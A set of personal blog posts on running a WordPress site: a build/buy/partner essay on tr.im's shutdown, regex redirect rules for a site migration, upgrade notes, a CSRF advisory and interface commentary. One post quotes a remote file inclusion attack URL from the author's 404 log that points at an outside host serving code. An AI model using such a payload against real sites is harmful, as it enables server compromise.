The death of tr.im, or why you are your own product manager

The recent flap over the impending death of tr.im reminds me of a discussion I had at the Berkman Center when I crashed one of their meetings back in 2004. The question was, do you use external services with your blog? That is, do you host your images on Flickr or a related service? Do you outsource comment management? These days, the question is do you host your own videos or do you let YouTube do it; or do you use a URL shortener.

Fundamentally, these are strategic questions like the ones that product managers face every day. The question is “Build, Buy, or Partner?” and it’s a question about how you add functionality to your product offering. In this case, the “product offering” is your public presence on the Internet–which is to say, in public, on-the-record discourse. As the question is conventionally understood, “build” means build it yourself, “buy” means acquire the functionality via some sort of purchase of rights, and “partner” means make a business arrangement where the partner delivers the functionality directly. In web development terms:

  • Build: You can build most of the functionality that people use on the web, from photo galleries to URL shorteners, yourself if you are a reasonably competent programmer.
  • Buy: You are acquiring via a license (even a free one) functionality from a third party and providing that functionality to your users. Can include purchased software or free software, whole packages or plugins.
  • Partner: You are using third party services directly–embedding photos and video from someone else’s server, using a third party URL shortener, etc.

So how do you decide to build, buy or partner? You can ask yourself the same questions that product managers everywhere ask:

  1. Do I have the capability to create this functionality?
  2. Do I want the responsibility of maintaining this functionality and adding to it over the long run?
  3. Is this functionality a core part of what I do? Do I derive some sort of competitive advantage from it?
  4. How much control over the final product do I want?
  5. Can I afford to have the content go away?

If you can do #1 but not #2, buy might be a better option than build. If the answer to #4 is “a lot”, partnering is not an appropriate option.

Let’s look at some people’s reactions to the event in this light:

Dave Winer had chosen the “partnership” model with tr.im (in the sense described above, that he is using their services and building atop them), building a lot of functionality on top of their APIs. He sees tr.im’s collapse as an argument to eliminate URL shorteners altogether, or at least to require that they provide a portability option. Portability is a way that you can escape Question #5, a safety clause if the partner goes out of business or if you don’t like what they’re doing with your content. I think that shortened-URL portability is in this analogy the equivalent of source code escrow and other safety provisions in conventional software contracts–it’s your escape hatch to make sure your personal data isn’t threatened. This is a perfectly sane request if you’re entering a real partnership relationship, where you’re adding value to the other party’s offering.

By contrast, Jeffrey Zeldman went the “buy” path, installing a WordPress URL shortening plugin to share pointers to his own content. For him, having short links to his content that work indefinitely is too important to risk having “the third-party URL shortening site [go] down or [go] out of business.”

Looking at it through the build-buy-partner lens, it’s also easy to see why WordPress has become such a dominant platform. The ability to add third-party developed plugins to add functionality provides a wide variety of options to add new functionality and allows you more options than simply blindly partnering with another organization, without any assurance that they’ll continue to support you.

Why go down this path at all? Why worry about the longevity of what are almost certainly transient services? One way to look at it is this: at the end of the day, your web presence is your product, and you are its product manager. You are responsible for the strategy that determines how the world views you. And in that light, it makes sense to borrow some strategies from product management to plan that strategy. Others use the formulation “You are your own CEO”; as your own CEO, consider that what people interact with online is not you but a product.

Fixing a hole: Migrating a site structure with the Redirection plugin

Over the weekend, as previously noted, my hosting provider redirected two old versions of my blog to the new WordPress blog. When that change kicked in, it unleashed a storm of 404s as links pointing into the old site structure hit the new site structure.

There are a number of systematic changes from the old site to the new site:

  • Daily pages from my static site. These URLs look like /yyyy/mm/dd.html, and for whatever reason they weren’t redirecting to /yyyy/mm/dd/.
  • Category links from my dynamic site. This one was a mess, because there were at least two main ways of accessing my old category pages: /newsItems/department/n and /newsItems/viewDepartment$n.
  • RSS links. My old RSS link was at a different location, and apparently a lot of feed readers are still polling there.
  • Print-friendly links. Manila used to have a text-only print-friendly format; URLs with the ?print-friendly=true option were failing.
  • Differing site structures. Some of the changes were simply because I set up the new site differently.

Fortunately, most of the problems are easily solved with the help of regular expressions and the Redirection plug-in for WordPress. The redirect rules for the static date pages and the news item department pages were rewritten as follows:

  • ​/(d*)​/(d*)​/(d*).html –>/$1/$2/$3
  • ​/newsItems​/departments​/([a-zA-Z0-9]*) –> /category/$1/
  • ​/newsItems​/viewDepartment$([a-zA-Z0-9]*) –> /category/$1/

All made nice and straightforward, once you grok the syntax.

Of course, I could have used Apache’s .htaccess and these regex rules, but the big advantage of the Redirection plugin is that it counts how many times each rule is used, and links the 404 log into the rules writing engine in a very clever way. It’s very simple to find a 404, write a rule, test the rule to verify that the filter is working, and then go on your merry way.

I did have to make a decision to turn off some functionality. I don’t have mailto any more, my old sitemap is gone and not coming back, and some other odds & ends are not to return. I’ve enumerated those in my Blog Feature Graveyard.

Consolidation time

Just a quick housekeeping note–over the weekend my hosting provider finally consolidated my www, discuss, and wp.jarretthousenorth.com sites onto one machine. You can go ahead and head over to www.jarretthousenorth.com now.

With this consolidation, my Manila blog is finally no more. I cut my blogging teeth on Edit This Page and the other features which at the time were state of the art, but which didn’t move as fast as the revolution they spawned.

Jarrett House North became a WordPress site last year, but the old version of the site lived on at two different web addresses — which didn’t help my Google presence at all. Now, though, you can find me at www, discuss, or wp.jarretthousenorth.com and it will all be the same site.

I have a few broken links to fix, so bear with me. I have to mention in passing that I highly recommend the superb Redirection plugin for finding and fixing 404s on a WordPress site.

Now serving Gravatars

WordPress 2.5 and later have built-in support for Gravatars — site-independent avatars. They’re basically small pictures that can appear next to your comments across multiple sites, depending on the email address you registered with the main Gravatar site.

I hadn’t gotten around to hacking the theme I’m using–which apparently predates WP 2.5–for Gravatar support, but (per the Codex) adding the support was trivial. I added this line of code in the comments loop and was all set, aside from some trivial additions to the CSS to display the gravatar in the right place:

<?php
echo get_avatar( $comment, $size = '48' );
?>

You can see what it looks like below. And if you sign up with the service, when you leave a comment on my blog your avatar (G-rated only–my blog policy enforces it) will appear next to your comment. Nice trick.

WordPress 2.7 First Impressions

I just did the upgrade to WordPress 2.7 on my server and am getting to know it. My first impressions:

  1. The upgrade was smoother this time, perhaps because I knew what I was doing. I didn’t even have to clear cookies to make it work.
  2. The admin interface, which is the major focus of this release, UI wise, is going to take some getting used to. It’s busier than the old interface, which is rarely good. And I’ve already published my criticism of the left hand navigation. The good news is that for the most part it’s getting out of my way and letting me write.
  3. The posting interface is more cluttered too. I never had to bother about the autosave notices before, because they stayed out of the way and were discreet in white text against a dark background. The autosave notices now are very visible when they happen, and pretty distracting. And after the last interface the new screens seem a little washed out (I’m using the blue color scheme).
  4. It took me a few seconds to figure out that the “Edit” link in the Posts module would take me to a list of all my posts–that used to be the Manage Posts link. I understand the reason for the change, but Edit isn’t the first thing I think about when I’m searching through my old posts, my most frequent reason for visiting that part of the admin interface.

The only plugin issue I had was with Simple Tags. On the reboot a notice advised me that I should use “Simple Tagging” by the same author instead. This doesn’t appear to have been correct; all I needed to do was upgrade Simple Tags.

Redirecting away from lost comments

I thought I had linked to Urban Giraffe’s great Redirection WordPress plug-in, but there was a glitch between Ubiquity and Delicious and the link didn’t get saved. Ah well. The point is that Redirection makes it dead simple to do two things: track 404s (dead links) that users hit on your site, and create redirects so that people coming to that link get served valid content.

I’ve been going through the process of reviewing the 404s for the first few days, and have found three general types of 404:

  1. Old Manila stories that were part of my old site structure but didn’t get published in the same way on WordPress. This is easy to fix, because WordPress lets you edit the “pretty URL” for these pages directly.
  2. Attack URLs. These tend to look like /inc​/cmses​/aedatingCMS.php?dir[inc]=http:​/​/rfi.at.ua​/test.txt?? and represent bots trying to exploit known software vulnerabilities. I generally am ignoring these right now.
  3. Permalinks to comments.

This third one is the sad part. Somewhere along the way, whether when I turned off comments on my Manila site or at some other point, all the old comments on my posts were lost. So there’s nowhere for me to redirect: the content’s gone. Comments ranging from the banal to the friendly, from Dave Sifry of Technorati pre-announcing link voting to the late Anita Rowland reminding me to follow up on a post on universal remotes.

I’m now going through the sad task of removing those links one at a time on this site. I guess entropy is alive and well.

But the point is that Redirection is a great WP plugin.

WordPress 2.6.3 CSRF security vulnerability

No link, because I’m posting this from my iPhone. But it looks like WordPress 2.6.3, the latest version, has a cross site request forgery vulnerability. The way CSRF works, if you have your WP site open and are logged in, an attacker can use another web page that’s open at the same time to perform actions on your blog, like deleting users. No word yet that I’ve seen about a fix. I’ll post more about CSRF in a while.

Update: Here’s the official published vulnerability (CVE-2008-5113) from the National Vulnerability Database. And here’s a good description of how CSRF works from OWASP. The scary bit is that if the application isn’t patched, there’s not a lot you can do to mitigate the attack. I haven’t seen anything official from WordPress yet on this vulnerability, but there’s an interesting discussion trail on the bug. Bottom line for app developers: don’t trust user input, and yes the HTTP request needs to be considered user input.

WordPress gives a window into user experience design

With the WordPress 2.7 Navigation Options Survey, the fine folks at WordPress.org have opened the kimono on one of the trickiest product management tasks: user experience design. The context: the administrative interface of WordPress. The UI was famously redesigned earlier this year by Happy Cog studios, who applied a rigorous information architecture along with a highly readable visual style. So why redesign now?

Well, it appears that users didn’t like the way the dashboard used screen real estate. While the WordPress team doesn’t describe what the users complained about, the key navigation options are currently along the top, and I would guess that users who have widescreen monitors are pointing out that horizontal screen real estate is less precious than vertical. So the team has created a survey to get user feedback about some design options.

This is a tricky task, and it could have been made a little easier by some better user requirements gathering. For instance, what the team is fundamentally trying to do in identifying top-level command categories is classically served by “card sorting,” a classic usability design exercise. They might get better feedback by doing a card-sort study, either offline or with a software package like WebSort.

Second, the presentation of the choices doesn’t include a control. It assumes that all users prefer the vertical menu and presents variations on that option. Adding an option for the existing horizontal menu might present some valuable information on how users feel about the existing option.

My opinion may be tainted by my personal preferences; I’m one who finds the current administrative interface design preferable to what I’ve seen so far of the new direction. But regardless of my personal feelings, there’s something to be said for rigorous user centered design in determining the next direction.

Akismet update 2.1.8 fixes “delete all” problem

A quick note to those who live and die by Akismet’s comment spam filtering: recent versions of Akismet appeared to have broken the ability to delete your spam comments, but version 2.1.8, released late yesterday, fixes the bug. Not a showstopping bug by any stretch of the imagination, since the plugin automatically flushes spam comments after 15 days anyway, but I was impressed with the responsiveness of the team when I reported the issue yesterday morning and the fix was available today.

BTW, Akismet just caught my 500th piece of comment spam (in a four month period).

Getting attention

There’s a cute comic up at WPLover that highlights an interesting UI trend: the rise of the speech bubble. If you don’t have a WordPress blog, you may never have seen this UI, but it’s pretty much as the comic strip shows it. In the dashboard UI, there are a series of tabs for common tasks–comment management, etc.–and if something needs your attention on one of those tabs, a “speech bubble” pops up with the number of things you need to address.

What the comic points out is that this makes perfect sense for comments (a speech bubble with the number of comments is a congruent metaphor). But indicating the number of plugins needing updates is a little different–should your WordPress plugins really be talking to you?

I think the first treatment of this concept that I saw was Apple’s new mail count in Mail.app, but they didn’t treat it as a speech bubble (there was no “tail” on the little red badge showing the count). This treatment is probably the more portable UI convention.

WordPress 2.6.1 is out

After the difficulty I had with the WordPress 2.6 upgrade, I was both hopeful that 2.6.1 would fix some of the bugs, and a little hesitant about the upgrade. Apparently both my anticipations were incorrect. WordPress 2.6.1 was released yesterday, and while there’s no explicit mention of the admin cookie bug that I hit on the 2.6 upgrade, my own upgrade to 2.6.1 was pretty easy.

The full fixed bug list is on the WordPress Trac, so you may want to see if there’s any fixes you need. As another commenter pointed out, there are few security fixes, but that doesn’t mean there aren’t any–the thing about a plugin without headers not appearing on the plugins page raises concerns about hidden malware that might be worth upgrading to avoid. Just remember to clear your cookies before you try to log back into the admin console after the upgrade.

Update: Images and WordPress 2.6

I may have been too hasty to condemn the WordPress for iPhone app. One of my criticisms was that it couldn’t upload a photo to my site. Well, I just discovered that I couldn’t either, even using the browser. This appears to be another issue with WordPress 2.6.

Fortunately the fix is simple: fill in the otherwise optional Full URL path to files (optional) field on the Settings » Miscellaneous section of your control panel with the actual path to your images–usually http://yourdomain.com/yourwordpressdirectory/wp-content/–and save the settings. The forum doesn’t have a consensus on what caused this optional field to become mandatory, but that appears to fix it for most users.

WordPress for iPhone

I’m writing this post with the released WordPress client for the iPhone. It’s simple to use. Enter the URL for your WP blog (self hosted or on wordpress.org), a valid username and password, and the app connects to your blog and configures itself.

As you can see below, not only does the client support categories and tags, but photos as well. You can either incorporate an existing photo from your library or take a photo from within the app.

Concerns:

  • the text editor doesn’t provide any shortcuts for markup, so even creating a simple list is pretty arduous
  • the app only prompts for a password once–convenient, but a security risk. If you lose your iPhone, your blog is compromised.

Overall, though, a killer 1.0 and a good way to really mobilize blogging. I look forward to giving the app a proper shakedown next week at Tanglewood.

Update: Okay, there are a few other bugs to shake out:

  • The UI for actually posting a post is a little non-intuitive. Rather than a big Publish button, you have to change the status of the post to Published, then save the post. This is probably so that you don’t hit the button with your thumb by mistake, but it’s still a little annoying.
  • The publish process seems buggy. My post at first failed to publish–the app crashed–then published, without sending its image. To attach the screen capture, I resorted to emailing the photo to Flickr, then adding the URL to the post. Not trivial, and without copy and paste impossible to tie the photo back to the post without going to the computer.

The photo thing is annoying. The crashes on posting are a big big problem.

WordPress 2.6 upgrade–fixing a login problem

This blog is now running WordPress 2.6. This was the first WordPress update I had done since moving to the platform, and I thought I’d share a few pointers:

  1. Follow the extended directions, particularly the ones about backing up your installation and deactivating plugins.
  2. You may see references to a plugin for automatic updates. No offense to the developer, but it really is beta. It didn’t work for my upgrade to 2.6.
  3. After doing the upgrade, clear your cookies or you may not be able to log into your control panel.

I thought I had done step #3 but I hadn’t. When I couldn’t log in, I had a moment of panic, and ended up rolling back my whole site to last night’s backup with help from Erin at Weblogger. Repeating the process with a cooler head resolved the issue.

Short weeks

… are the fun weeks, aren’t they? I feel like I’m up to my eyeballs in work and yet the week just started.

Miscellaneous notes:

  • I’m within striking distance of reaching zero unlistened to tracks in my iTunes library, after almost two years of dedicated listening to ensure that I listened to every track in the library at least once. As of the end of the Great CD Ripping Project that was around 20,000 tracks; it’s a bit more now. I’ve got it down to fewer than 500 tracks that haven’t been listened to at least once.
  • I’m starting to like this theme; think I’ll stick with it a while longer. If I get bored I’ll always switch it to Stripped.